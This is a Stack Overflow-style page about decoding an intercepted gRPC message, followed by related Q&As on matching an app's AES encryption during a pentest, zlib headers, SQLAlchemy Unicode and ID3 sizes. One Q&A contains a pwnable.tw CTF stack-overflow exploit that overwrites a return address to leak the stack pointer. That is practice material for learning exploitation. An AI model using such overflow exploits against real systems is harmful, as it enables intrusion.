Deserializing gRPC message - python

Problem
I intercepted a gRPC network request from an application and intend to modify its contents and resend the message programmatically. Since no tools (except for MitmProxy, see below) were able to decode the protobuf data, I want to know why that is.
The gRPC payload sent from the client:
gRPC header (compressed flag + payload length) | Protobuf data
[00] [00 00 00 22] [12 12 09 c3 8d 09 16 c3 93 2a c2 a5 4d 40 11 14 39 c3 ab 6b c2 a2 c3 b3 31 40 1a 05 65 6e 2d 53 45 1a 05 73 76 2d 53 45]
 ^^   ^^^^^^^^^^^
 |    payload length
 compressed flag
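For anyone who wants to feed the tools only the protobuf part, here is a minimal sketch (my own, not from the capture tooling) of splitting that 5-byte frame (flag byte + big-endian length prefix) in Python; the hex is the capture from above:
import struct

# The captured frame, pasted as hex: 1-byte flag + 4-byte length + body.
frame = bytes.fromhex(
    "00" "00000022"
    "121209c38d0916c3932ac2a54d401114"
    "39c3ab6bc2a2c3b331401a05656e2d53"
    "451a0573762d5345"
)

compressed_flag = frame[0]                     # 0x00 -> not compressed
(msg_len,) = struct.unpack(">I", frame[1:5])   # big-endian length prefix: 0x22 = 34
protobuf_body = frame[5:]                      # what the protobuf tools should be fed

print(compressed_flag, msg_len, len(protobuf_body))   # 0 34 40 -- the mismatch noted below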
What I've tried
Failure
protoc --decode_raw on the protobuf data, but I get Failed to parse input.
CyberChef with protobuf decode, gives Error: Exhausted Buffer
The blackboxprotobuf python module, raising google.protobuf.message.DecodeError: Invalid Message Length
Success
MitmProxy was able to decode the data to the following:
gRPC message 0 (compressed False)
[message] 2
[fixed64] 2.1 4633543028839346763
[fixed64] 2.2 4625748902140211098
[message] 3
[fixed32] 3.12 1163079022
[string] 3 sv-SE
Manually decoding
[message]
00010 010 00010010
2 LEN 18
[fixed64]
00001 001 [11000011 10001101 00001001 00010110 11000011 10010011 00101010 11000010]
1 I64 13991157658477498000
[fixed32]
10100 101 [01001101 01000000 00010001 00010100]
20 I32 336674893
[fixed64]
00111 001 [11000011 10101011 01101011 11000010 10100010 11000011 10110011 00110001]
7 I64 3581421232503631000
[unknown]
01000 000 [00011010 00000101]
8 VARINT ???
[message]
00011 010 00000101
3 LEN 5
[fixed32]
01100 101 [01101110 00101101 01010011 01000101]
12 I32 1163079022
[string]
00011 010 00000101 [01110011 01110110 00101101 01010011 01000101]
3 LEN 5 s v - S E
I decoded it using the Google documentation as a reference: https://developers.google.com/protocol-buffers/docs/encoding. However, I am not familiar with gRPC or protobuf, so I likely have gaps in my knowledge.
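As a cross-check of the manual decode, here is a minimal top-level wire-format walker (my own sketch; it only skips over LEN payloads rather than recursing into them, and it assumes a well-formed buffer):
def read_varint(buf, i):
    # Base-128 varint: 7 data bits per byte, MSB set means "more bytes follow".
    value = shift = 0
    while True:
        b = buf[i]
        i += 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, i
        shift += 7

def walk(buf):
    i = 0
    while i < len(buf):
        tag, i = read_varint(buf, i)
        field, wire_type = tag >> 3, tag & 0x07
        if wire_type == 0:          # VARINT
            value, i = read_varint(buf, i)
        elif wire_type == 1:        # I64 (fixed64)
            value, i = buf[i:i + 8], i + 8
        elif wire_type == 2:        # LEN (submessage, string, bytes, ...)
            length, i = read_varint(buf, i)
            value, i = buf[i:i + length], i + length
        elif wire_type == 5:        # I32 (fixed32)
            value, i = buf[i:i + 4], i + 4
        else:
            raise ValueError("unsupported wire type %d" % wire_type)
        print(field, wire_type, value)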
Worth noting:
I was able to successfully decode all server responses without problems.
The payload length as indicated by the gRPC header (0x22) differs from its actual length (0x28).
MitmProxy has access to both the gRPC headers and the protobuf data, while the other tools I tried (that all failed) only support protobuf data as input.
I do not know for a fact that MitmProxy decoded the data correctly, only that it ran without exceptions
According to the user agent, the client uses grpc-swift-nio/1.9.0

Related

Python Crypto AES 128 with PKCS7Padding different outputs from Swift vs Python

I'm trying to reproduce the output produced by CCCrypt with the following key
key = base64.b64decode('PyxZO31GlgKvWm+3GLySzAAAAAAAAAAAAAAAAAAAAAA=') (16 bytes)
and the
message = "y_device=y_C9DB602E-0EB7-4FF4-831E-8DA8CEE0BBF5"
My IV looks like this:
iv = base64.b64decode('AAAAAAAAAAAAAAAAAAAAAA==')
Objective-C's CCCrypt produces the following output: 4Mmg/BPgc2jDrGL+XRA3S1d8vm02LqTaibMewJ+9LLuE3mV92HjMvVs/OneUCLD4
It appears to use AlgorithmAES128 with PKCS7Padding and the key provided above.
I'm trying to implement the same encryption in Python so that I get that same output.
This is what I've put together so far:
import base64
from Crypto.Util.Padding import pad
from Crypto.Cipher import AES

class MyCrypt():
    def __init__(self, key, iv):
        self.key = key
        self.iv = iv
        self.mode = AES.MODE_CBC

    def encrypt(self, text):
        cryptor = AES.new(self.key, self.mode, self.iv)
        text = pad(text, 16)
        self.ciphertext = cryptor.encrypt(text)
        return self.ciphertext

key = base64.b64decode('PyxZO31GlgKvWm+3GLySzAAAAAAAAAAAAAAAAAAAAAA=')
IV = base64.b64decode('AAAAAAAAAAAAAAAAAAAAAA==')
plainText = 'y_device=y_C9DB602E-0EB7-4FF4-831E-8DA8CEE0BBF5'.encode('utf-8')
crypto = MyCrypt(key, IV)
encrypt_data = crypto.encrypt(plainText)
encoder = base64.b64encode(encrypt_data)
print(encrypt_data, encoder)
This produces the following output: Pi3yzpoVhax0Cul1VkYoyYCivZrEliTDBpDbqZ3dD1bwTUycstAF+MLSTIjSMiQj instead of 4Mmg/BPgc2jDrGL+XRA3S1d8vm02LqTaibMewJ+9LLuE3mV92HjMvVs/OneUCLD4, which isn't my desired output.
Should I not be using MODE_ECB, or am I using the key as intended?
To add more context:
I'm new to crypto and Objective-C.
I'm currently pentesting an app, which does some hashing behind the scenes.
Using Frida I'm tracing these function calls, and I see the following get populated for the Swift/Objective-C calls:
CCCrypt(operation: 0x0, CCAlgorithm: 0x0, CCOptions: 0x1, keyBytes: 0x1051f8639, keyLength: 0x10, ivBuffer: 0x1051f8649, inBuffer: 0x2814bd890, inLength: 0x58, outBuffer: 0x16f1c5d90, outLength: 0x60, outCountPtr: 0x16f1c5e10)
One such call, with its buffers dumped, looks like this:
CCCrypt(operation: 0x0, CCAlgorithm: 0x0, CCOptions: 0x1, keyBytes: 0x1051f8639, keyLength: 0x10, ivBuffer: 0x1051f8649, inBuffer: 0x280e41530, inLength: 0x2f, outBuffer: 0x16f1c56c0, outLength: 0x30, outCountPtr: 0x16f1c5710)
In buffer:
0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
280e41530 79 5f 64 65 76 69 63 65 3d 79 5f 43 39 44 42 36 y_device=y_C9DB6
280e41540 30 32 45 2d 30 45 42 37 2d 34 46 46 34 2d 38 33 02E-0EB7-4FF4-83
280e41550 31 45 2d 38 44 41 38 43 45 45 30 42 42 46 35 1E-8DA8CEE0BBF5
Key (16 bytes):
0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
1051f8639 3f 2c 59 3b 7d 46 96 02 af 5a 6f b7 18 bc 92 cc ?,Y;}F...Zo.....
IV (16 bytes):
0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
1051f8649 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
I'm using https://opensource.apple.com/source/CommonCrypto/CommonCrypto-36064/CommonCrypto/CommonCryptor.h as a reference for the type of encryption happening based on the argument values, e.g. for the CCOptions argument the value 0x1 is passed.
key = base64.b64decode('PyxZO31GlgKvWm+3GLySzAAAAAAAAAAAAAAAAAAAAAA=') (16 bytes)
Nope, that's 32 bytes. It's true that only 16 are non-zero, making a really poor key, but if you pass 256 bits, you are doing AES-256, and you'll get a different result than you would from AES-128 using the first 128 bits of that key.
Your title mentions PKCS #7 padding, but it looks like your code is padding with zeros. That will change the results as well.
ECB doesn't use an IV. If you can see that the Swift code is using the IV, you might be able to see what mode it's using too, or you could try CBC as a first guess. ECB is insecure in most cases. Of course, using a fixed IV is also insecure.
Your output is longer than it should be (64 bytes instead of 48). Your attempt to do the padding yourself is probably responsible for this.
From <CommonCryptor.h>, we can decode the parameters used in Swift's call to CCCrypt:
Type         Value  Name                   Comment
CCOperation  0x0    kCCEncrypt             Symmetric encryption.
CCAlgorithm  0x0    kCCAlgorithmAES128     Advanced Encryption Standard, 128-bit block
CCOptions    0x1    kCCOptionPKCS7Padding  Perform PKCS7 padding.
CCOptions    0x2    kCCOptionECBMode       Electronic Code Book Mode. Default is CBC.
CCOptions is a bit field, and kCCOptionECBMode is not set, so the default is used.
So this is AES-128 in CBC mode with PKCS #7 padding.
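A minimal PyCryptodome sketch of that configuration (first 16 key bytes only, CBC, PKCS#7, the all-zero IV from the question); assuming the analysis above is right and CCCrypt really uses only those 16 key bytes, this should reproduce the expected base64 string:
import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad

key = base64.b64decode('PyxZO31GlgKvWm+3GLySzAAAAAAAAAAAAAAAAAAAAAA=')[:16]  # AES-128: first 16 bytes only
iv = base64.b64decode('AAAAAAAAAAAAAAAAAAAAAA==')                            # 16 zero bytes, as traced
plaintext = 'y_device=y_C9DB602E-0EB7-4FF4-831E-8DA8CEE0BBF5'.encode('utf-8')

cipher = AES.new(key, AES.MODE_CBC, iv)
ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))  # pad() defaults to PKCS#7

print(base64.b64encode(ciphertext).decode())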

How to keep the header and trailer while zlib decompress and compress

I have raw stream data extracted from a PDF; I decompressed it and then compressed it again.
I expected the same header and trailer, but the header was changed.
Original Hex Header
48 89 EC 57 ....
Converted Hex Header
78 9C EC BD ...
I dug into zlib compression and found that 48 is also a valid first byte for a zlib header, although 78 is the one most commonly used.
Here is my code, which decompresses and then recompresses:
import zlib

decompress_wbit = 12
compress_variable = 6

output_data = zlib.decompress(open(raw_data, "rb").read(), decompress_wbit)
output_data = zlib.compress(output_data, compress_variable)

output_file = open(raw_data + '_', "wb")
output_file.write(output_data)
output_file.close()
I changed decompress_wbit and compress_variable, but the header still starts with 78, so I'm not sure how to get 48 as the first header byte.
Here is a short description of the zlib header:
CINFO (bits 12-15)
Indicates the window size as a power of two, from 0 (256 bytes) to 7 (32768 bytes). This will usually be 7. Higher values are not allowed.
CM (bits 8-11)
The compression method. Only Deflate (8) is allowed.
FLEVEL (bits 6-7)
Roughly indicates the compression level, from 0 (fast/low) to 3 (slow/high)
FDICT (bit 5)
Indicates whether a preset dictionary is used. This is usually 0. 1 is technically allowed, but I don't know of any Deflate formats that define preset dictionaries.
FCHECK (bits 0-4)
A check value (5 bits, 0..31), calculated such that the entire 16-bit header value (CMF*256 + FLG) is divisible by 31.
Typically, only the CINFO and FLEVEL fields can be freely changed, and FCHECK must be calculated based on the final value. Assuming no preset dictionary, there is no choice in what the other fields contain, so a total of 32 possible headers are valid. Here they are:
FLEVEL:      0      1      2      3
CINFO:
  0        08 1D  08 5B  08 99  08 D7
  1        18 19  18 57  18 95  18 D3
  2        28 15  28 53  28 91  28 CF
  3        38 11  38 4F  38 8D  38 CB
  4        48 0D  48 4B  48 89  48 C7
  5        58 09  58 47  58 85  58 C3
  6        68 05  68 43  68 81  68 DE
  7        78 01  78 5E  78 9C  78 DA
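A quick Python check of the FCHECK rule against two of the headers above (the original 48 89 and the commonly seen 78 9C):
# A valid zlib header satisfies (CMF*256 + FLG) % 31 == 0.
for cmf, flg in ((0x48, 0x89), (0x78, 0x9C)):
    assert (cmf * 256 + flg) % 31 == 0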
Please let me know how to keep the zlib header the same when decompressing and recompressing.
Thanks for your time.
I will first note that it doesn't matter. The data will be decompressed fine with that zlib header. Why do you care?
You are giving zlib.compress a small amount of data that permits a smaller window. Since it is permitted, the Python library is electing to compress with a smaller window.
A way to avoid that would be to use zlib.compressobj instead. When initialized, it doesn't know how much data you will be feeding it, so it defaults to the largest window size.
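A minimal sketch of both options (the file name is a placeholder; the explicit wbits=12 line is my own addition to reproduce the original 48 89 header, not something the answer above prescribes):
import zlib

raw_data = "pdf_stream.bin"   # placeholder path for the extracted raw stream

with open(raw_data, "rb") as f:
    original = f.read()
data = zlib.decompress(original)

# Option 1: compressobj() with defaults uses the largest window -> header 78 xx.
co = zlib.compressobj(6)
largest = co.compress(data) + co.flush()

# Option 2 (assumption): force the 4 KiB window the original stream appears to use.
# wbits=12 gives CINFO=4, and level 6 gives FLEVEL=2, i.e. the 48 89 header.
co = zlib.compressobj(6, zlib.DEFLATED, 12)
matched = co.compress(data) + co.flush()

print(original[:2].hex(), largest[:2].hex(), matched[:2].hex())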

Exploiting system calls in assembly

I'm attempting to solve pwnable.tw's start challenge to learn a bit more about exploits. The provided disassembled binary looks like this:
start: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: 54 push esp
8048061: 68 9d 80 04 08 push 0x804809d
8048066: 31 c0 xor eax,eax
8048068: 31 db xor ebx,ebx
804806a: 31 c9 xor ecx,ecx
804806c: 31 d2 xor edx,edx
804806e: 68 43 54 46 3a push 0x3a465443
8048073: 68 74 68 65 20 push 0x20656874
8048078: 68 61 72 74 20 push 0x20747261
804807d: 68 73 20 73 74 push 0x74732073
8048082: 68 4c 65 74 27 push 0x2774654c
8048087: 89 e1 mov ecx,esp ; buffer = $esp
8048089: b2 14 mov dl,0x14 ; count = 0x14 (20)
804808b: b3 01 mov bl,0x1 ; fd = 1 (stdout)
804808d: b0 04 mov al,0x4 ; system call = 4 (sys_write)
804808f: cd 80 int 0x80 ; call sys_write(1, $esp, 20)
8048091: 31 db xor ebx,ebx ; fd = 0 (stdin)
8048093: b2 3c mov dl,0x3c ; count = 0x3c (60)
8048095: b0 03 mov al,0x3 ; system call = 3 (sys_read)
8048097: cd 80 int 0x80 ; sys_read(0, ecx/$esp, 60)
8048099: 83 c4 14 add esp,0x14
804809c: c3 ret
0804809d <_exit>:
804809d: 5c pop esp
804809e: 31 c0 xor eax,eax
80480a0: 40 inc eax
Several writeups (1, 2, and 3) point out that the solution lies in leaking the esp address that was moved into ecx by exploiting the count values on sys_write and sys_read. This way, we can force the return address to 0x8048087 so that the program will loop and print the content of esp.
However, I do not understand how this really works. What exactly do the system calls do to registers and how does that change the return address? Why does the below exploit work?
from socket import *
from struct import *

c = socket(AF_INET, SOCK_STREAM)
c.connect(('chall.pwnable.tw', 10000))

# leak esp: 20 filler bytes fill the buffer, the next 4 bytes overwrite the
# return slot so that `ret` jumps back to 0x08048087 (mov ecx,esp; sys_write)
c.send('x' * 20 + pack('<I', 0x08048087))

# the re-executed write sends 20 bytes starting at the new esp;
# its first dword is the esp value saved by `push esp` at _start
esp = unpack('<I', c.recv(0x100)[:4])[0]
print 'esp = {0:08x}'.format(esp)
I believe a step-by-step walkthrough that displays per-step register values could really help clarify the problem.
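For what it's worth, my own reading of the stack right before the ret, derived only from the disassembly above (offsets are relative to the buffer address loaded into ecx):

buf+0x00 .. buf+0x13   "Let's start the CTF:"   <- ecx; sys_write prints it, sys_read overwrites it
buf+0x14               0x0804809d (_exit)       <- the dword that `ret` pops after `add esp,0x14`
buf+0x18               esp saved at entry       <- pushed by `push esp` at 0x8048060

sys_read(0, ecx, 60) starts writing at buf+0x00, so bytes 20-23 of the input land exactly in the return slot. Sending 'x'*20 followed by 0x08048087 therefore makes ret jump back to `mov ecx,esp`; at that point esp points at the saved-esp slot (buf+0x18), so the re-run sys_write(1, ecx, 20) sends the saved esp as its first four bytes, which is what recv()[:4] unpacks.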

SQLAlchemy Unicode conundrum

I'm having a weird problem regarding Unicode handling with SQLAlchemy.
In short, when I insert a Python unicode string into a Unicode column
of my MySQL database, I have no trouble getting it back out. On the database
side, however, it gets stored as a weird 4-byte sequence (and no, this
doesn't seem to have anything to do with the 'utf8mb4' default on
MySQL).
My problem is that I have a MySQL dump from another machine that
contains straight UTF8 characters in the SQL. When I try to retrieve
data imported from that other machine I get UnicodeDecodeErrors all the
time.
Below I've included a minimal example that illustrates the problem.
utf8test.sql: Set up a database and create one row with a Unicode
character in it
utf8test.py: Open DB using SQLAlchemy, insert 1 row with
Python's idea of an UTF character, and retrieve both rows.
It turns out that Python can retrieve the data it inserted itself just fine,
but it balks at the literal 'ü' I put into the SQL import script.
Investigation of the hexdumps of both a mysqldumped dataset
and the binary data files of MySQL itself shows that the UTF-8 character
inserted via SQL is the real deal (German umlaut 'ü' = UTF-8 'c3 bc'),
whereas the Python-inserted 'ä' gets converted to the sequence
'c3 83 c2 a4', which I don't understand (see hexdump down below;
I've used 'xxx' and 'yyy' as markers to facilitate finding them
in the hexdump).
Can anybody shed any light on this?
This creates the test DB:
dh#jenna:~/python$ cat utf8test.sql
DROP DATABASE IF EXISTS utftest;
CREATE DATABASE utftest;
USE utftest;
CREATE TABLE x (
id INTEGER PRIMARY KEY AUTO_INCREMENT,
text VARCHAR(10)
);
INSERT INTO x(text) VALUES ('xxxü');
COMMIT;
dh#jenna:~/python$ mysql < utf8test.sql
Here's the Python script:
dh#jenna:~/python$ cat utf8test.py
# -*- encoding: utf8 -*-
from sqlalchemy import create_engine, Column, Unicode, Integer
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base

Base = declarative_base()

class X(Base):
    __tablename__ = 'x'
    id = Column(Integer, primary_key=True)
    text = Column(Unicode(10))

engine = create_engine('mysql://localhost/utftest',
                       encoding='utf8')
Base.metadata.create_all(engine)

Session = sessionmaker(engine)
db = Session()
x = X(text=u'yyyä')
db.add(x)
db.commit()

rs = db.query(X.text).all()
for r in rs:
    print(r.text)
db.close()
This happens when I run the script (runs without error when I
omit the INSERT INTO bit in utf8test.sql):
dh#jenna:~/python$ python utf8test.py
Traceback (most recent call last):
File "utf8test.py", line 23, in <module>
rs = db.query(X.text).all()
[...]
UnicodeDecodeError: 'utf8' codec can't decode
byte 0xfc in position 3: invalid start byte
Here's a hexdump to confirm that the two umlauts are indeed stored
differently in the DB. Using hd I've also confirmed that both the
Python and the SQL scripts are themselves UTF-8 encoded.
dh#jenna:~/python$ mysqldump utftest | hd
00000000 2d 2d 20 4d 79 53 51 4c 20 64 75 6d 70 20 31 30 |-- MySQL dump 10|
00000010 2e 31 36 20 20 44 69 73 74 72 69 62 20 31 30 2e |.16 Distrib 10.|
00000020 31 2e 33 37 2d 4d 61 72 69 61 44 42 2c 20 66 6f |1.37-MariaDB, fo|
00000030 72 20 64 65 62 69 61 6e 2d 6c 69 6e 75 78 2d 67 |r debian-linux-g|
00000040 6e 75 20 28 69 36 38 36 29 0a 2d 2d 0a 2d 2d 20 |nu (i686).--.-- |
[...]
00000520 4c 45 20 4b 45 59 53 20 2a 2f 3b 0a 49 4e 53 45 |LE KEYS */;.INSE|
00000530 52 54 20 49 4e 54 4f 20 60 78 60 20 56 41 4c 55 |RT INTO `x` VALU|
00000540 45 53 20 28 31 2c 27 78 78 78 c3 bc 27 29 2c 28 |ES (1,'xxx..'),(|
00000550 32 2c 27 79 79 79 c3 83 c2 a4 27 29 3b 0a 2f 2a |2,'yyy....');./*|
c3 83 c2 a4 is the "double encoding" of ä, as Ilja points out. It is discussed further here:
http://mysql.rjweb.org/doc.php/charcoll#fixes_for_various_cases provides an UPDATE to fix the data.
Here is a checklist of things that may need to be fixed in your Python: http://mysql.rjweb.org/doc.php/charcoll#python
But this is scary: I see c3 bc (Mojibake for ü) and c3 83 c2 a4 (double-encoding of ä). This implies that you have two different problems happening in the same code. Back up to ground zero and make sure you are using utf8 (or utf8mb4) at all stages. Your database may be too messed up to recover from, so consider starting over.
Possibly the only issue is the absence of # -*- encoding: utf8 -*- from one of the python scripts. But, no. You do need that, yet the double-encoding occurred when you used it.
Bottom line: You have multiple errors.
Adding ?use_utf8=0 to the DB URL solves the problem. Found that in the SQLAlchemy docs.
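For reference, that fix applied to the create_engine() call from the script above would look like this (the use_utf8 flag is as reported by the OP; the commented-out charset variant is a common alternative added here for comparison, not something from this thread):
from sqlalchemy import create_engine

# As reported above: pass use_utf8=0 through the DB URL.
engine = create_engine('mysql://localhost/utftest?use_utf8=0', encoding='utf8')

# Common alternative (my assumption, not from this thread): tell the MySQL driver
# to use utf8 on the connection so the SQL-imported and ORM-inserted rows agree.
# engine = create_engine('mysql://localhost/utftest?charset=utf8')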

How to unpack ID3 header's size

I am trying to unpack the ID3v2.3 header with Python 2.7. However, I do not fully understand the first 10 bytes of the MP3 format. For example:
49 44 33 03 00 00 | 00 00 21 76 | 54 41 4C 42
.I .D .3 .3 .0 | RawSize | Size
Using Synalyze it! I can see that RawSize is 0x2176 and Size is 4342.
At offset 4352 is where the MPEG data frames begin. I need to know how
54 41 4C 42 gets converted to 4342 because when I tried:
>>> unpack('i', '\x54\x41\x4C\x42')
(1112293716,)
which does not look anything like 4352!
How should I read them in general?
Firstly, you give 14 bytes there, not 10.
Secondly, you've botched reading the size completely. The size is stored in the four bytes 00 00 21 76 as 7-bit ("syncsafe") values rather than 8-bit values.
>>> 0x00 << 21 | 0x00 << 14 | 0x21 << 7 | 0x76
4342
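For completeness, a small Python 3 sketch of reading the 10-byte header and the syncsafe size with struct (the header bytes are the ones from the question):
import struct

header = b'\x49\x44\x33\x03\x00\x00\x00\x00\x21\x76'   # 'ID3', v2.3.0, flags 0, size bytes

ident, major, minor, flags = struct.unpack('>3sBBB', header[:6])
s0, s1, s2, s3 = struct.unpack('4B', header[6:10])

# Syncsafe size: 7 bits per byte, most significant byte first.
size = (s0 << 21) | (s1 << 14) | (s2 << 7) | s3

print(size)   # 4342 -> the MPEG data begins at offset 10 + 4342 = 4352, as in the question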
